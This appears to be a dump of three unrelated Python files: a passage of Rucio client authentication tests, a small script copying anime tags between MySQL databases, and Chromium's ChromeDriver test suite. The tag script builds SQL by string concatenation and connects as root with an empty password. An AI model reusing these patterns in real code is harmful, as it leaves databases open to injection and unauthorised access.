if config_get_bool('common', 'multi_vo', raise_exception=False, default=False):
self.vo = {'vo': get_long_vo()}
try:
remove(get_tmp_dir() + '/.rucio_root@%s/auth_token_root' % self.vo['vo'])
except OSError as error:
if error.args[0] != 2:
raise error
else:
self.vo = {}
self.cacert = config_get('test', 'cacert')
self.usercert = config_get('test', 'usercert')
self.userkey = config_get('test', 'userkey')
try:
remove(get_tmp_dir() + '/.rucio_root/auth_token_root')
except OSError as error:
if error.args[0] != 2:
raise error
def testUserpass(self):
""" CLIENTS (BASECLIENT): authenticate with userpass."""
creds = {'username': 'ddmlab', 'password': 'secret'}
BaseClient(account='root', ca_cert=self.cacert, auth_type='userpass', creds=creds, **self.vo)
def testUserpassWrongCreds(self):
""" CLIENTS (BASECLIENT): try to authenticate with wrong username."""
creds = {'username': 'wrong', 'password': 'secret'}
with pytest.raises(CannotAuthenticate):
BaseClient(account='root', ca_cert=self.cacert, auth_type='userpass', creds=creds, **self.vo)
def testUserpassNoCACert(self):
""" CLIENTS (BASECLIENT): authenticate with userpass without ca cert."""
creds = {'username': 'wrong', 'password': 'secret'}
with pytest.raises(CannotAuthenticate):
BaseClient(account='root', auth_type='userpass', creds=creds, **self.vo)
def testx509(self):
""" CLIENTS (BASECLIENT): authenticate with x509."""
creds = {'client_cert': self.usercert,
'client_key': self.userkey}
BaseClient(account='root', ca_cert=self.cacert, auth_type='x509', creds=creds, **self.vo)
def testx509NonExistingCert(self):
""" CLIENTS (BASECLIENT): authenticate with x509 with missing certificate."""
creds = {'client_cert': '/opt/rucio/etc/web/notthere.crt'}
with pytest.raises(CannotAuthenticate):
BaseClient(account='root', ca_cert=self.cacert, auth_type='x509', creds=creds, **self.vo)
def testClientProtocolNotSupported(self):
""" CLIENTS (BASECLIENT): try to pass an host with a not supported protocol."""
creds = {'username': 'ddmlab', 'password': 'secret'}
with pytest.raises(ClientProtocolNotSupported):
BaseClient(rucio_host='localhost', auth_host='junk://localhost', account='root', auth_type='userpass', creds=creds, **self.vo)
def testRetryOn502AlwaysFail(self):
""" CLIENTS (BASECLIENT): Ensure client retries on 502 error codes, but fails on repeated errors"""
class AlwaysFailWith502(MockServer.Handler):
def do_GET(self):
self.send_code_and_message(502, {}, '')
with MockServer(AlwaysFailWith502) as server:
with pytest.raises(CannotAuthenticate):
creds = {'username': 'ddmlab', 'password': 'secret'}
BaseClient(rucio_host=server.base_url, auth_host=server.base_url, account='root', auth_type='userpass', creds=creds, **self.vo)
with pytest.raises(RucioException):
creds = {'client_cert': self.usercert,
'client_key': self.userkey}
BaseClient(rucio_host=server.base_url, auth_host=server.base_url, account='root', ca_cert=self.cacert, auth_type='x509', creds=creds, **self.vo)
def testRetryOn502SucceedsEventually(self):
""" CLIENTS (BASECLIENT): Ensure client retries on 502 error codes"""
invocations = []
class FailTwiceWith502(MockServer.Handler):
def do_GET(self, invocations=invocations):
invocations.append(self.path)
if len(invocations) <= 2:
self.send_code_and_message(502, {}, '')
else:
self.send_code_and_message(200, {'x-rucio-auth-token': 'sometoken'}, '')
start_time = datetime.utcnow()
with MockServer(FailTwiceWith502) as server:
creds = {'username': 'ddmlab', 'password': 'secret'}
del invocations[:]
client = BaseClient(rucio_host=server.base_url, auth_host=server.base_url, account='root', auth_type='userpass', creds=creds, **self.vo)
del invocations[:]
client._send_request(server.base_url) # noqa
# The client did back-off multiple times before succeeding: 2 * 0.25s (authentication) + 2 * 0.25s (request) = 1s
assert datetime.now() - start_time > timedelta(seconds=0.9)
class TestRucioClients(unittest.TestCase):
""" To test Clients"""
def setUp(self):
if config_get_bool('common', 'multi_vo', raise_exception=False, default=False):
self.vo = {'vo': get_long_vo()}
else:
self.vo = {}
self.cacert = config_get('test', 'cacert')
self.marker = '$> '
def test_ping(self):
""" PING (CLIENT): Ping Rucio """
creds = {'username': 'ddmlab', 'password': 'secret'}
client = Client(account='root', ca_cert=self.cacert, auth_type='userpass', creds=creds, **self.vo)
print(client.ping())
|
tagsyi.py
|
import time
import pymysql
import multiprocessing
from pymysql.cursors import DictCursor
from multiprocessing import Process, Pool
db1 = pymysql.connect("localhost", "root", "", "bidscore")
db2 = pymysql.connect("localhost", "root", "", "miraihyoka")
cursor_b = db1.cursor(DictCursor)
cursor_m = db2.cursor(DictCursor)
def getbangumiid(animate_id, bangumi_id, m):
sql2 = "select * from bidscore.tags where id=" + bangumi_id
cursor_b.execute(sql2)
items_b = cursor_b.fetchall()
for item_b in items_b:
tag = item_b["tag"]
sql1 = "insert into miraihyoka.tags(animate_id, tag) value (%s,%s)"
args = (animate_id, tag)
cursor_m.execute(sql1, args)
db2.commit()
print("-----------------已插入" + str(m) + "条-----------------")
if __name__ == '__main__':
sql1 = "select * from animate"
db2.ping(reconnect=True)
cursor_m.execute(sql1)
items_m = cursor_m.fetchall()
nnn = 0
aa=Pool(30)
for item_m in items_m:
an = item_m["animate_id"]
bid = item_m["bangumi_idid"]
if bid is not None:
nnn += 1
aa.apply(getbangumiid, args=(an, bid, nnn))
# p = Process(target=getbangumiid, args=(an, bid, nnn))
# p.start()
|
chromedriver_tests.py
|
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Tests for ChromeDriver.
If your test is testing a specific part of the WebDriver API, consider adding
it to the appropriate place in the WebDriver tree instead.
"""
import binascii
from distutils import archive_util
import hashlib
import httplib
import os
import platform
import signal
import subprocess
import sys
import tempfile
import threading
import time
import unittest
import urllib
import urllib2
import urlparse
from chromedriver_factory import ChromeDriverFactory
from chromedriver_launcher import ChromeDriverLauncher
from chromedriver_test import ChromeDriverTest
import test_paths
import util
try:
import simplejson as json
except ImportError:
import json
from selenium.common.exceptions import NoSuchWindowException
from selenium.common.exceptions import WebDriverException
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.remote.command import Command
from selenium.webdriver.remote.webdriver import WebDriver
from selenium.webdriver.support.ui import WebDriverWait
def SkipIf(should_skip):
"""Decorator which allows skipping individual test cases."""
if should_skip:
return lambda func: None
return lambda func: func
class Request(urllib2.Request):
"""Extends urllib2.Request to support all HTTP request types."""
def __init__(self, url, method=None, data=None):
"""Initialise a new HTTP request.
Arguments:
url: The full URL to send the request to.
method: The HTTP request method to use; defaults to 'GET'.
data: The data to send with the request as a string. Defaults to
None and is ignored if |method| is not 'POST' or 'PUT'.
"""
if method is None:
method = data is not None and 'POST' or 'GET'
elif method not in ('POST', 'PUT'):
data = None
self.method = method
urllib2.Request.__init__(self, url, data=data)
def get_method(self):
"""Returns the HTTP method used by this request."""
return self.method
def SendRequest(url, method=None, data=None):
"""Sends a HTTP request to the WebDriver server.
Return values and exceptions raised are the same as those of
|urllib2.urlopen|.
Arguments:
url: The full URL to send the request to.
method: The HTTP request method to use; defaults to 'GET'.
data: The data to send with the request as a string. Defaults to
None and is ignored if |method| is not 'POST' or 'PUT'.
Returns:
A file-like object.
"""
request = Request(url, method=method, data=data)
request.add_header('Accept', 'application/json')
opener = urllib2.build_opener(urllib2.HTTPRedirectHandler())
return opener.open(request)
class BasicTest(ChromeDriverTest):
"""Basic ChromeDriver tests."""
def setUp(self):
self._server2 = ChromeDriverLauncher(self.GetDriverPath()).Launch()
def tearDown(self):
self._server2.Kill()
def testShouldReturn403WhenSentAnUnknownCommandURL(self):
request_url = self._server2.GetUrl() + '/foo'
try:
SendRequest(request_url, method='GET')
self.fail('Should have raised a urllib.HTTPError for returned 403')
except urllib2.HTTPError, expected:
self.assertEquals(403, expected.code)
def testShouldReturnHTTP405WhenSendingANonPostToTheSessionURL(self):
request_url = self._server2.GetUrl() + '/session'
try:
SendRequest(request_url, method='GET')
self.fail('Should have raised a urllib.HTTPError for returned 405')
except urllib2.HTTPError, expected:
self.assertEquals(405, expected.code)
self.assertEquals('POST', expected.hdrs['Allow'])
def testShouldGetA404WhenAttemptingToDeleteAnUnknownSession(self):
request_url = self._server2.GetUrl() + '/session/unkown_session_id'
try:
SendRequest(request_url, method='DELETE')
self.fail('Should have raised a urllib.HTTPError for returned 404')
except urllib2.HTTPError, expected:
self.assertEquals(404, expected.code)
def testShouldReturn204ForFaviconRequests(self):
request_url = self._server2.GetUrl() + '/favicon.ico'
# In python2.5, a 204 status code causes an exception.
if sys.version_info[0:2] == (2, 5):
try:
SendRequest(request_url, method='GET')
self.fail('Should have raised a urllib.HTTPError for returned 204')
except urllib2.HTTPError, expected:
self.assertEquals(204, expected.code)
else:
response = SendRequest(request_url, method='GET')
try:
self.assertEquals(204, response.code)
finally:
response.close()
def testCreatingSessionShouldRedirectToCorrectURL(self):
request_url = self._server2.GetUrl() + '/session'
response = SendRequest(request_url, method='POST',
data='{"desiredCapabilities": {}}')
self.assertEquals(200, response.code)
self.session_url = response.geturl() # TODO(jleyba): verify this URL?
data = json.loads(response.read())
self.assertTrue(isinstance(data, dict))
self.assertEquals(0, data['status'])
url_parts = urlparse.urlparse(self.session_url)[2].split('/')
self.assertEquals(3, len(url_parts))
self.assertEquals('', url_parts[0])
self.assertEquals('session', url_parts[1])
self.assertEquals(data['sessionId'], url_parts[2])
class WebserverTest(ChromeDriverTest):
"""Tests the built-in ChromeDriver webserver."""
def testShouldNotServeFilesByDefault(self):
server = ChromeDriverLauncher(self.GetDriverPath()).Launch()
try:
SendRequest(server.GetUrl(), method='GET')
self.fail('Should have raised a urllib.HTTPError for returned 403')
except urllib2.HTTPError, expected:
self.assertEquals(403, expected.code)
finally:
server.Kill()
def testCanServeFiles(self):
launcher = ChromeDriverLauncher(self.GetDriverPath(),
root_path=os.path.dirname(__file__))
server = launcher.Launch()
request_url = server.GetUrl() + '/' + os.path.basename(__file__)
SendRequest(request_url, method='GET')
server.Kill()
class NativeInputTest(ChromeDriverTest):
"""Native input ChromeDriver tests."""
_CAPABILITIES = {'chrome.nativeEvents': True }
def testCanStartWithNativeEvents(self):
driver = self.GetNewDriver(NativeInputTest._CAPABILITIES)
self.assertTrue(driver.capabilities['chrome.nativeEvents'])
# Flaky on windows. See crbug.com/80295.
def DISABLED_testSendKeysNative(self):
driver = self.GetNewDriver(NativeInputTest._CAPABILITIES)
driver.get(self.GetTestDataUrl() + '/test_page.html')
# Find the text input.
q = driver.find_element_by_name('key_input_test')
# Send some keys.
q.send_keys('tokyo')
self.assertEqual(q.text, 'tokyo')
# Needs to run on a machine with an IME installed.
def DISABLED_testSendKeysNativeProcessedByIME(self):
driver = self.GetNewDriver(NativeInputTest._CAPABILITIES)
driver.get(self.GetTestDataUrl() + '/test_page.html')
q = driver.find_element_by_name('key_input_test')
# Send key combination to turn IME on.
q.send_keys(Keys.F7)
q.send_keys('toukyou')
# Now turning it off.
q.send_keys(Keys.F7)
self.assertEqual(q.get_attribute('value'), "\xe6\x9d\xb1\xe4\xba\xac")
class DesiredCapabilitiesTest(ChromeDriverTest):
"""Tests for webdriver desired capabilities."""
def testCustomSwitches(self):
switches = ['enable-file-cookie']
capabilities = {'chrome.switches': switches}
driver = self.GetNewDriver(capabilities)
driver.get('about:version')
self.assertNotEqual(-1, driver.page_source.find('enable-file-cookie'))
driver.quit()
def testBinary(self):
self.GetNewDriver({'chrome.binary': self.GetChromePath()})
def testUserProfile(self):
"""Test starting WebDriver session with custom profile."""
# Open a new session and save the user profile.
profile_dir = tempfile.mkdtemp()
capabilities = {'chrome.switches': ['--user-data-dir=' + profile_dir]}
driver = self.GetNewDriver(capabilities)
driver.get(self.GetTestDataUrl() + '/test_page.html')
# Create a cookie.
cookie_dict = {}
cookie_dict['name'] = 'test_user_profile'
cookie_dict['value'] = 'chrome profile'
cookie_dict['expiry'] = time.time() + 120
driver.add_cookie(cookie_dict)
driver.quit()
profile_zip = archive_util.make_archive(os.path.join(profile_dir,
'profile'),
'zip',
root_dir=profile_dir,
base_dir='Default')
f = open(profile_zip, 'rb')
base64_user_profile = binascii.b2a_base64(f.read()).strip()
f.close()
os.remove(profile_zip)
# Start new session with the saved user profile.
capabilities = {'chrome.profile': base64_user_profile}
driver = self.GetNewDriver(capabilities)
driver.get(self.GetTestDataUrl() + '/test_page.html')
cookie_dict = driver.get_cookie('test_user_profile')
self.assertNotEqual(cookie_dict, None)
self.assertEqual(cookie_dict['value'], 'chrome profile')
driver.quit()
def testInstallExtensions(self):
"""Test starting web driver with multiple extensions."""
extensions = ['ext_test_1.crx', 'ext_test_2.crx']
base64_extensions = []
for ext in extensions:
f = open(test_paths.GetTestDataPath(ext), 'rb')
base64_ext = (binascii.b2a_base64(f.read()).strip())
base64_extensions.append(base64_ext)
f.close()
capabilities = {'chrome.extensions': base64_extensions}
driver = self.GetNewDriver(capabilities)
extension_names = [x.get_name() for x in driver.get_installed_extensions()]
self.assertEquals(2, len(extension_names))
self.assertTrue('ExtTest1' in extension_names)
self.assertTrue('ExtTest2' in extension_names)
driver.quit()
def testPrefs(self):
"""Test that chromedriver can set user preferences."""
driver = self.GetNewDriver({
'chrome.noWebsiteTestingDefaults': True,
'chrome.prefs': {
'profile.default_content_settings': {
'popups': 1
},
}
})
driver.get(self.GetTestDataUrl() + '/empty.html')
driver.execute_script('window.open("about:blank")')
self.assertEquals(2, len(driver.window_handles))
class DetachProcessTest(ChromeDriverTest):
def setUp(self):
self._server2 = ChromeDriverLauncher(self.GetDriverPath()).Launch()
self._factory2 = ChromeDriverFactory(self._server2)
def tearDown(self):
self._server2.Kill()
# TODO(kkania): Remove this when Chrome 15 is stable.
# crbug.com/134982
def DISABLED_testDetachProcess(self):
# This is a weak test. Its purpose is to just make sure we can start
# Chrome successfully in detached mode. There's not an easy way to know
# if Chrome is shutting down due to the channel error when the client
# disconnects.
driver = self._factory2.GetNewDriver({'chrome.detach': True})
driver.get('about:memory')
pid = int(driver.find_elements_by_xpath('//*[@jscontent="pid"]')[0].text)
self._server2.Kill()
try:
util.Kill(pid)
except OSError:
self.fail('Chrome quit after detached chromedriver server was killed')
class CookieTest(ChromeDriverTest):
"""Cookie test for the json webdriver protocol"""
def testAddCookie(self):
driver = self.GetNewDriver()
driver.get(self.GetTestDataUrl() + '/test_page.html')
cookie_dict = None
cookie_dict = driver.get_cookie("chromedriver_cookie_test")
cookie_dict = {}
cookie_dict["name"] = "chromedriver_cookie_test"
cookie_dict["value"] = "this is a test"
driver.add_cookie(cookie_dict)
cookie_dict = driver.get_cookie("chromedriver_cookie_test")
self.assertNotEqual(cookie_dict, None)
self.assertEqual(cookie_dict["value"], "this is a test")
def testDeleteCookie(self):
driver = self.GetNewDriver()
self.testAddCookie();
driver.delete_cookie("chromedriver_cookie_test")
cookie_dict = driver.get_cookie("chromedriver_cookie_test")
self.assertEqual(cookie_dict, None)
class ScreenshotTest(ChromeDriverTest):
"""Tests to verify screenshot retrieval"""
REDBOX = "automation_proxy_snapshot/set_size.html"
def testScreenCaptureAgainstReference(self):
# Create a red square of 2000x2000 pixels.
url = util.GetFileURLForPath(test_paths.GetChromeTestDataPath(self.REDBOX))
url += '?2000,2000'
driver = self.GetNewDriver()
driver.get(url)
s = driver.get_screenshot_as_base64()
h = hashlib.md5(s).hexdigest()
# Compare the PNG created to the reference hash.
self.assertEquals(h, '12c0ade27e3875da3d8866f52d2fa84f')
# This test requires Flash and must be run on a VM or via remote desktop.
# See crbug.com/96317.
def testSnapshotWithWindowlessFlashAndTransparentOverlay(self):
if not util.IsWin():
return
driver = self.GetNewDriver()
driver.get(self.GetTestDataUrl() + '/plugin_transparency_test.html')
snapshot = driver.get_screenshot_as_base64()
self.assertEquals(hashlib.md5(snapshot).hexdigest(),
'72e5b8525e48758bae59997472f27f14')
class SessionTest(ChromeDriverTest):
"""Tests dealing with WebDriver sessions."""
def testShouldBeGivenCapabilitiesWhenStartingASession(self):
driver = self.GetNewDriver()
capabilities = driver.capabilities
self.assertEquals('chrome', capabilities['browserName'])
self.assertTrue(capabilities['javascriptEnabled'])
self.assertTrue(capabilities['takesScreenshot'])
self.assertTrue(capabilities['cssSelectorsEnabled'])
# Value depends on what version the server is starting.
self.assertTrue('version' in capabilities)
self.assertTrue(
isinstance(capabilities['version'], unicode),
'Expected a %s, but was %s' % (unicode,
type(capabilities['version'])))
system = platform.system()
if system == 'Linux':
self.assertEquals('linux', capabilities['platform'].lower())
elif system == 'Windows':
self.assertEquals('windows', capabilities['platform'].lower())
elif system == 'Darwin':
self.assertEquals('mac', capabilities['platform'].lower())
else:
# No python on ChromeOS, so we won't have a platform value, but
# the server will know and return the value accordingly.
self.assertEquals('chromeos', capabilities['platform'].lower())
def testSessionCreationDeletion(self):
self.GetNewDriver().quit()
# crbug.com/103396
def DISABLED_testMultipleSessionCreationDeletion(self):
for i in range(10):
self.GetNewDriver().quit()
def testSessionCommandsAfterSessionDeletionReturn404(self):
driver = self.GetNewDriver()
url = self.GetTestDataUrl()
url += '/session/' + driver.session_id
driver.quit()
try:
response = SendRequest(url, method='GET')
self.fail('Should have thrown 404 exception')
except urllib2.HTTPError, expected:
self.assertEquals(404, expected.code)
def testMultipleConcurrentSessions(self):
drivers = []
for i in range(10):
drivers += [self.GetNewDriver()]
for driver in drivers:
driver.quit()
class ShutdownTest(ChromeDriverTest):
def setUp(self):
super(ShutdownTest, self).setUp()
self._custom_server = ChromeDriverLauncher(self.GetDriverPath()).Launch()
self._custom_factory = ChromeDriverFactory(self._custom_server,
self.GetChromePath())
def tearDown(self):
self._custom_server.Kill()
super(ShutdownTest, self).tearDown()
def testShutdownWithSession(self):
driver = self._custom_factory.GetNewDriver()
driver.get(self._custom_server.GetUrl() + '/status')
driver.find_element_by_tag_name('body')
self._custom_server.Kill()
def testShutdownWithBusySession(self):
def _Hang(driver):
"""Waits for the process to quit and then notifies."""
try:
driver.get(self._custom_server.GetUrl() + '/hang')
except httplib.BadStatusLine:
pass
driver = self._custom_factory.GetNewDriver()
wait_thread = threading.Thread(target=_Hang, args=(driver,))
wait_thread.start()
wait_thread.join(5)
self.assertTrue(wait_thread.isAlive())
self._custom_server.Kill()
wait_thread.join(10)
self.assertFalse(wait_thread.isAlive())
class MouseTest(ChromeDriverTest):
"""Mouse command tests for the json webdriver protocol"""
def setUp(self):
super(MouseTest, self).setUp()
self._driver = self.GetNewDriver()
def testCanClickTransparentElement(self):
self._driver.get(self.GetTestDataUrl() + '/transparent.html')
self._driver.find_element_by_tag_name('a').click()
self.assertTrue(self._driver.execute_script('return window.success'))
# crbug.com/136875
def DISABLED_testClickElementThatNeedsContainerScrolling(self):
self._driver.get(self.GetTestDataUrl() + '/test_page.html')
self._driver.find_element_by_name('hidden_scroll').click()
self.assertTrue(self._driver.execute_script('return window.success'))
# crbug.com/136875
def DISABLED_testClickElementThatNeedsIframeScrolling(self):
self._driver.get(self.GetTestDataUrl() + '/test_page.html')
self._driver.switch_to_frame('iframe')
self._driver.find_element_by_name('hidden_scroll').click()
self.assertTrue(self._driver.execute_script('return window.success'))
def testClickElementThatNeedsPageScrolling(self):
self._driver.get(self.GetTestDataUrl() + '/test_page.html')
self._driver.find_element_by_name('far_away').click()
self.assertTrue(self._driver.execute_script('return window.success'))
# TODO(kkania): Move this test to the webdriver repo.
def testClickDoesSelectOption(self):
self._driver.get(self.GetTestDataUrl() + '/test_page.html')
option = self._driver.find_element_by_name('option')
self.assertFalse(option.is_selected())
option.click()
self.assertTrue(option.is_selected())
def testClickDoesUseFirstClientRect(self):
self._driver.get(self.GetTestDataUrl() + '/test_page.html')
self._driver.find_element_by_name('wrapped').click()
self.assertTrue(self._driver.execute_script('return window.success'))
def testThrowErrorIfNotClickable(self):
self._driver.get(self.GetTestDataUrl() + '/not_clickable.html')
elem = self._driver.find_element_by_name('click')
self.assertRaises(WebDriverException, elem.click)
# crbug.com/109698: when running in xvfb, 2 extra mouse moves are received.
# crbug.com/138125: fails if the mouse cursor is left over the page.
@SkipIf(True)
class MouseEventTest(ChromeDriverTest):
"""Tests for checking the correctness of mouse events."""
def setUp(self):
super(MouseEventTest, self).setUp()
self._driver = self.GetNewDriver()
ActionChains(self._driver).key_down([Keys.CONTROL, Keys.SHIFT]).perform()
self._driver.get(self.GetTestDataUrl() + '/events.html')
self._divs = self._driver.find_elements_by_tag_name('div')
def _CheckEvent(self, event, event_type, mouse_button, x, y):
"""Checks the given event properties.
This function expects the ctrl and shift keys to be pressed.
"""
self.assertEquals(event_type, event['type'])
self.assertEquals(mouse_button, event['button'])
self.assertEquals(False, event['altKey'])
self.assertEquals(True, event['ctrlKey'])
self.assertEquals(True, event['shiftKey'])
self.assertEquals(x, event['x'])
self.assertEquals(y, event['y'])
def _GetElementMiddle(self, elem):
x = elem.location['x']
y = elem.location['y']
return (x + (elem.size['width'] + 1) / 2, y + (elem.size['height'] + 1) / 2)
def testMoveCommand(self):
x = self._divs[0].location['x']
y = self._divs[0].location['y']
center_x, center_y = self._GetElementMiddle(self._divs[0])
# Move to element.
ActionChains(self._driver).move_to_element(self._divs[0]).perform()
events = self._driver.execute_script('return takeEvents()')
self.assertEquals(1, len(events))
self._CheckEvent(events[0], 'mousemove', 0, center_x, center_y)
# Move by offset.
ActionChains(self._driver).move_by_offset(1, 2).perform()
events = self._driver.execute_script('return takeEvents()')
self.assertEquals(1, len(events))
self._CheckEvent(events[0], 'mousemove', 0, center_x + 1, center_y + 2)
# Move to element and offset.
ActionChains(self._driver).move_to_element_with_offset(
self._divs[0], 2, 1).perform()
events = self._driver.execute_script('return takeEvents()')
self.assertEquals(1, len(events))
self._CheckEvent(events[0], 'mousemove', 0, x + 2, y + 1)
def testClickCommand(self):
center_x, center_y = self._GetElementMiddle(self._divs[0])
# Left click element.
ActionChains(self._driver).click(self._divs[0]).perform()
events = self._driver.execute_script('return takeEvents()')
self.assertEquals(3, len(events))
self._CheckEvent(events[0], 'mousemove', 0, center_x, center_y)
self._CheckEvent(events[1], 'mousedown', 0, center_x, center_y)
self._CheckEvent(events[2], 'mouseup', 0, center_x, center_y)
# Left click.
ActionChains(self._driver).click(None).perform()
events = self._driver.execute_script('return takeEvents()')
self.assertEquals(2, len(events))
self._CheckEvent(events[0], 'mousedown', 0, center_x, center_y)
self._CheckEvent(events[1], 'mouseup', 0, center_x, center_y)
# Right click.
ActionChains(self._driver).context_click(None).perform()
events = self._driver.execute_script('return takeEvents()')
self.assertEquals(2, len(events))
self._CheckEvent(events[0], 'mousedown', 2, center_x, center_y)
self._CheckEvent(events[1], 'mouseup', 2, center_x, center_y)
def testButtonDownUpCommand(self):
center_x, center_y = self._GetElementMiddle(self._divs[0])
center_x2, center_y2 = self._GetElementMiddle(self._divs[1])
# Press and release element.
ActionChains(self._driver).click_and_hold(self._divs[0]).release(
self._divs[1]).perform()
events = self._driver.execute_script('return takeEvents()')
self.assertEquals(4, len(events))
self._CheckEvent(events[0], 'mousemove', 0, center_x, center_y)
self._CheckEvent(events[1], 'mousedown', 0, center_x, center_y)
self._CheckEvent(events[2], 'mousemove', 0, center_x2, center_y2)
self._CheckEvent(events[3], 'mouseup', 0, center_x2, center_y2)
# Press and release.
ActionChains(self._driver).click_and_hold(None).release(None).perform()
events = self._driver.execute_script('return takeEvents()')
self.assertEquals(2, len(events))
self._CheckEvent(events[0], 'mousedown', 0, center_x2, center_y2)
self._CheckEvent(events[1], 'mouseup', 0, center_x2, center_y2)
def testDoubleClickCommand(self):
center_x, center_y = self._GetElementMiddle(self._divs[0])
# Double click element.
ActionChains(self._driver).double_click(self._divs[0]).perform()
events = self._driver.execute_script('return takeEvents()')
self.assertEquals(6, len(events))
self._CheckEvent(events[5], 'dblclick', 0, center_x, center_y)
# Double click.
ActionChains(self._driver).double_click(None).perform()
events = self._driver.execute_script('return takeEvents()')
self.assertEquals(5, len(events))
self._CheckEvent(events[4], 'dblclick', 0, center_x, center_y)
def testElementAPIClick(self):
center_x, center_y = self._GetElementMiddle(self._divs[0])
# Left click element.
self._divs[0].click()
events = self._driver.execute_script('return takeEvents()')
self.assertEquals(3, len(events))
self._CheckEvent(events[0], 'mousemove', 0, center_x, center_y)
self._CheckEvent(events[1], 'mousedown', 0, center_x, center_y)
self._CheckEvent(events[2], 'mouseup', 0, center_x, center_y)
class TypingTest(ChromeDriverTest):
def setUp(self):
super(TypingTest, self).setUp()
self._driver = self.GetNewDriver()
def testSendKeysToEditingHostDiv(self):
self._driver.get(self.GetTestDataUrl() + '/content_editable.html')
div = self._driver.find_element_by_name('editable')
# Break into two to ensure element doesn't lose focus.
div.send_keys('hi')
div.send_keys(' there')
self.assertEquals('hi there', div.text)
def testSendKeysToNonFocusableChildOfEditingHost(self):
self._driver.get(self.GetTestDataUrl() + '/content_editable.html')
child = self._driver.find_element_by_name('editable_child')
self.assertRaises(WebDriverException, child.send_keys, 'hi')
def testSendKeysToFocusableChildOfEditingHost(self):
self._driver.get(self.GetTestDataUrl() + '/content_editable.html')
child = self._driver.find_element_by_tag_name('input')
child.send_keys('hi')
child.send_keys(' there')
self.assertEquals('hi there', child.get_attribute('value'))
def testSendKeysToDesignModePage(self):
self._driver.get(self.GetTestDataUrl() + '/design_mode_doc.html')
body = self._driver.find_element_by_tag_name('body')
body.send_keys('hi')
body.send_keys(' there')
self.assertEquals('hi there', body.text)
def testSendKeysToDesignModeIframe(self):
self._driver.get(self.GetTestDataUrl() + '/content_editable.html')
self._driver.switch_to_frame(0)
body = self._driver.find_element_by_tag_name('body')
body.send_keys('hi')
body.send_keys(' there')
self.assertEquals('hi there', body.text)
def testSendKeysToTransparentElement(self):
self._driver.get(self.GetTestDataUrl() + '/transparent.html')
text_box = self._driver.find_element_by_tag_name('input')
text_box.send_keys('hi')
self.assertEquals('hi', text_box.get_attribute('value'))
def testSendKeysDesignModePageAfterNavigate(self):
self._driver.get(self.GetTestDataUrl() + '/test_page.html')
self._driver.get(self.GetTestDataUrl() + '/design_mode_doc.html')
body = self._driver.find_element_by_tag_name('body')
body.send_keys('hi')
body.send_keys(' there')
self.assertEquals('hi there', body.text)
def testAppendsToTextInput(self):
self._driver.get(self.GetTestDataUrl() + '/keyboard.html')
text_elem = self._driver.find_element_by_name('input')
text_elem.send_keys(' text')
self.assertEquals('more text', text_elem.get_attribute('value'))
area_elem = self._driver.find_element_by_name('area')
area_elem.send_keys(' text')
self.assertEquals('more text', area_elem.get_attribute('value'))
def testTextAreaKeepsCursorPosition(self):
self._driver.get(self.GetTestDataUrl() + '/keyboard.html')
area_elem = self._driver.find_element_by_name('area')
area_elem.send_keys(' text')
area_elem.send_keys(Keys.LEFT * 9)
area_elem.send_keys('much ')
self.assertEquals('much more text', area_elem.get_attribute('value'))
def testWithWebWidgets(self):
def SetHTML(html):
"""Sets the page HTML.
The given HTML should not contain single quotes.
"""
assert '\'' not in html
self._driver.execute_script('document.body.innerHTML = \'%s\'' % html)
SetHTML('<input type="checkbox">check</input>')
elem = self._driver.find_element_by_tag_name('input')
elem.send_keys(' ')
self.assertTrue(elem.is_selected())
elem.send_keys(' ')
self.assertFalse(elem.is_selected())
SetHTML('<input type="radio" name="g" checked>1</input>' +
'<input type="radio" name="g">2</input>')
elem1, elem2 = self._driver.find_elements_by_tag_name('input')
elem1.send_keys(Keys.RIGHT)
self.assertTrue(elem2.is_selected())
elem2.send_keys(Keys.LEFT)
self.assertFalse(elem2.is_selected())
SetHTML('<select><option>a</option><option>b</option></select>')
elem = self._driver.find_element_by_tag_name('select')
elem.send_keys('b')
self.assertEquals('b', elem.get_attribute('value'))
handler = 'javascript:document.title=\\x27success\\x27'
SetHTML('<input type="button" onclick="%s"></input>' % handler)
elem = self._driver.find_element_by_tag_name('input')
elem.send_keys(' ')
self.assertEquals('success', self._driver.title)
class UrlBaseTest(ChromeDriverTest):
"""Tests that the server can be configured for a different URL base."""
def setUp(self):
self._server2 = ChromeDriverLauncher(self.GetDriverPath(),
url_base='/wd/hub').Launch()
def tearDown(self):
self._server2.Kill()
def testCreatingSessionShouldRedirectToCorrectURL(self):
request_url = self._server2.GetUrl() + '/session'
response = SendRequest(request_url, method='POST',
data='{"desiredCapabilities":{}}')
self.assertEquals(200, response.code)
self.session_url = response.geturl() # TODO(jleyba): verify this URL?
data = json.loads(response.read())
self.assertTrue(isinstance(data, dict))
self.assertEquals(0, data['status'])
url_parts = urlparse.urlparse(self.session_url)[2].split('/')
self.assertEquals(5, len(url_parts))
self.assertEquals('', url_parts[0])
self.assertEquals('wd', url_parts[1])
self.assertEquals('hub', url_parts[2])
self.assertEquals('session', url_parts[3])
self.assertEquals(data['sessionId'], url_parts[4])
# TODO(jleyba): Port this to WebDriver's own python test suite.
class ElementEqualityTest(ChromeDriverTest):
"""Tests that the server properly checks element equality."""
def setUp(self):
super(ElementEqualityTest, self).setUp()
self._driver = self.GetNewDriver()
def tearDown(self):
self._driver.quit()
def testElementEquality(self):
self._driver.get(self.GetTestDataUrl() + '/test_page.html')
body1 = self._driver.find_element_by_tag_name('body')
body2 = self._driver.execute_script('return document.body')
# TODO(jleyba): WebDriver's python bindings should expose a proper API
# for this.
result = body1._execute(Command.ELEMENT_EQUALS, {
'other': body2.id
})
self.assertTrue(result['value'])
class LoggingTest(ChromeDriverTest):
def testLogging(self):
url = self.GetServer().GetUrl()
req = SendRequest(url + '/log', method='GET')
log = req.read()
self.assertTrue('INFO' in log, msg='INFO not in log: ' + log)
class FileUploadControlTest(ChromeDriverTest):
"""Tests dealing with file upload control."""
def setUp(self):
super(FileUploadControlTest, self).setUp()
self._driver = self.GetNewDriver()
# Fails on win - crbug.com/131782
def DISABLED_testSetFilePathToFileUploadControl(self):
"""Verify a file path is set to the file upload control."""
self._driver.get(self.GetTestDataUrl() + '/upload.html')
tmp_file = tempfile.NamedTemporaryFile()
fileupload_single = self._driver.find_element_by_name('fileupload_single')
multiple = fileupload_single.get_attribute('multiple')
self.assertEqual('false', multiple)
